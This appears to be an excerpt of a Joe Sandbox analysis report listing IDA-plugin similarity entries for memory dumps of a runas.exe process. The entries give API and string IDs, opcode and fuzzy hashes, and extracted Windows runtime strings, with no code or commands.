                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                              • Instruction ID: 6e7ba96b81f5547532738b6a7b0baf359db610f52d08b76060886785a713b4cf
                                                                                                              • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                              • Instruction Fuzzy Hash: BD02F471608342AFD705DF18C990AAFBBE5FFC8704F04892DB9994B264DB31E905DB92
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-$0$0
                                                                                                              • API String ID: 1302938615-699404926
                                                                                                              • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                              • Instruction ID: 44e6c26f01f6e219ca2a167ecbbb05f389d050025726fb94865b010d0197df61
                                                                                                              • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                              • Instruction Fuzzy Hash: 3781C270E052698FDF288E68DA907FEBBB1BF46310F18461BD861A72D1D734B940EB50
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                              • API String ID: 48624451-2819853543
                                                                                                              • Opcode ID: 35eabebaf685a198310ecec90ccc93ae100ca9802641a9e2d9f22bd548eb4997
                                                                                                              • Instruction ID: a9659c3ee01358bee1fe62716c3af092e536cae1d25054101d32711a9d341417
                                                                                                              • Opcode Fuzzy Hash: 35eabebaf685a198310ecec90ccc93ae100ca9802641a9e2d9f22bd548eb4997
                                                                                                              • Instruction Fuzzy Hash: BF215176A00219ABDB10DFA9E840AAEBBE8FF44654F540566F905E3240E730E911ABA1
                                                                                                              Strings
                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 045502BD
                                                                                                              • RTL: Re-Waiting, xrefs: 0455031E
                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 045502E7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                              • API String ID: 0-2474120054
                                                                                                              • Opcode ID: 5a90d2a26b77881064872ee0e55c4d32c57614ce5b29c8c4a54547e56fc7344b
                                                                                                              • Instruction ID: 93c293708986c2d1a8828d7f9809a1e08e3f9cac2fd3a4fa28eebf6a18e16803
                                                                                                              • Opcode Fuzzy Hash: 5a90d2a26b77881064872ee0e55c4d32c57614ce5b29c8c4a54547e56fc7344b
                                                                                                              • Instruction Fuzzy Hash: 28E1AD356047419FD734CF28D894B2AB7E0BF88714F144A1AF9958B2E1E7B4F845EB42
                                                                                                              Strings
                                                                                                              • RTL: Resource at %p, xrefs: 04557B8E
                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04557B7F
                                                                                                              • RTL: Re-Waiting, xrefs: 04557BAC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 0-871070163
                                                                                                              • Opcode ID: 5d4889566bcf76f49f8b28dad8d9fc9dbe92c8786ebc7b1746c3a16e69bce61b
                                                                                                              • Instruction ID: 0ce4abac1d7d350387c3f0006dad011709d50fbb62542e139a16d52ebcc08248
                                                                                                              • Opcode Fuzzy Hash: 5d4889566bcf76f49f8b28dad8d9fc9dbe92c8786ebc7b1746c3a16e69bce61b
                                                                                                              • Instruction Fuzzy Hash: 1E41D1357007029FE720DE25D850B6AB7E5FF88720F100A1EF956DB6A0EB31F405AB91
                                                                                                              APIs
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0455728C
                                                                                                              Strings
                                                                                                              • RTL: Resource at %p, xrefs: 045572A3
                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04557294
                                                                                                              • RTL: Re-Waiting, xrefs: 045572C1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 885266447-605551621
                                                                                                              • Opcode ID: 6c9cb4ba14c65909562e1b63668df2518166ceb3741baffd95ce67d6c9d1b374
                                                                                                              • Instruction ID: 2865c80b953ca2c3e76ab29fe3205f63d04422f5f05a43271be62ef60f7706f4
                                                                                                              • Opcode Fuzzy Hash: 6c9cb4ba14c65909562e1b63668df2518166ceb3741baffd95ce67d6c9d1b374
                                                                                                              • Instruction Fuzzy Hash: 8441F235700202AFE720DE25EC41F6AB7A5FB88714F104A1AFD55EB250EB61F842ABD1
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$]:%u
                                                                                                              • API String ID: 48624451-3050659472
                                                                                                              • Opcode ID: fa4977d7ea45d35a690826731234c6b5e41837116a4ab7e54a4ecc265649b067
                                                                                                              • Instruction ID: c6a3d34a4bf31d41d165e263d0b774efb582665cbc1d95ea32e5f93dfb495f0d
                                                                                                              • Opcode Fuzzy Hash: fa4977d7ea45d35a690826731234c6b5e41837116a4ab7e54a4ecc265649b067
                                                                                                              • Instruction Fuzzy Hash: E0314572A00619AFDF20DE29DC40BEE77E8FB44614F544996F849E3140EB30BE449BA1
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-
                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                              • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                              • Instruction ID: 5e1db1dddf8bf1795ac7c0ae8d0bef4fe972a450fc7fb4786e9b7ed133084927
                                                                                                              • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                              • Instruction Fuzzy Hash: 2491D971E042369BDF24DF69DA816BEB7A1FF4A320F14461BE855E72C0E730B940A761
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $$@
                                                                                                              • API String ID: 0-1194432280
                                                                                                              • Opcode ID: 21a890c26390de3054dedbbeb6274771591381eaa9d8aa047f9131b1866ed8bf
                                                                                                              • Instruction ID: e344483060cace033b3d77cf612c0583cb478d0fd2691076b5db7b7760892e02
                                                                                                              • Opcode Fuzzy Hash: 21a890c26390de3054dedbbeb6274771591381eaa9d8aa047f9131b1866ed8bf
                                                                                                              • Instruction Fuzzy Hash: 658109B1D002699BDB318F54CC44BEAB7B4BF48755F0441EAE919B7280E730AE85DFA0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943079379.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4300000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (5&?$)#.;$*$co+*
                                                                                                              • API String ID: 0-3696694785
                                                                                                              • Opcode ID: bb8a81b06ffb0d376b4e3ae73c31d08ad200b31a9f5ea6ed8a597375d42aa11a
                                                                                                              • Instruction ID: 0edbf5c5de2ed5b8dacd6221cdc194f24307c23d19144c71d5f143d46b656374
                                                                                                              • Opcode Fuzzy Hash: bb8a81b06ffb0d376b4e3ae73c31d08ad200b31a9f5ea6ed8a597375d42aa11a
                                                                                                              • Instruction Fuzzy Hash: 92F0E221018B888BCB046B14D48059A7BD1FB8970DF801B6DE88ED72A1EA79D609C78B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943079379.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4300000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .d(%$; $F9p{$p{8@
                                                                                                              • API String ID: 0-1339804953
                                                                                                              • Opcode ID: 4d256f719f28eec0328a44b88e5b506bce7dbdadeac2d50cefe524b9ee06f2a8
                                                                                                              • Instruction ID: e8bb16c07524c4d3ca41fb48e5157a7663efc583c67d0e3b9a69b8318468e182
                                                                                                              • Opcode Fuzzy Hash: 4d256f719f28eec0328a44b88e5b506bce7dbdadeac2d50cefe524b9ee06f2a8
                                                                                                              • Instruction Fuzzy Hash: 8CF0A030018B844BDB09AB10D44469BBBD1FBC830CF400B5DE8CEDA294DAB9D601C74A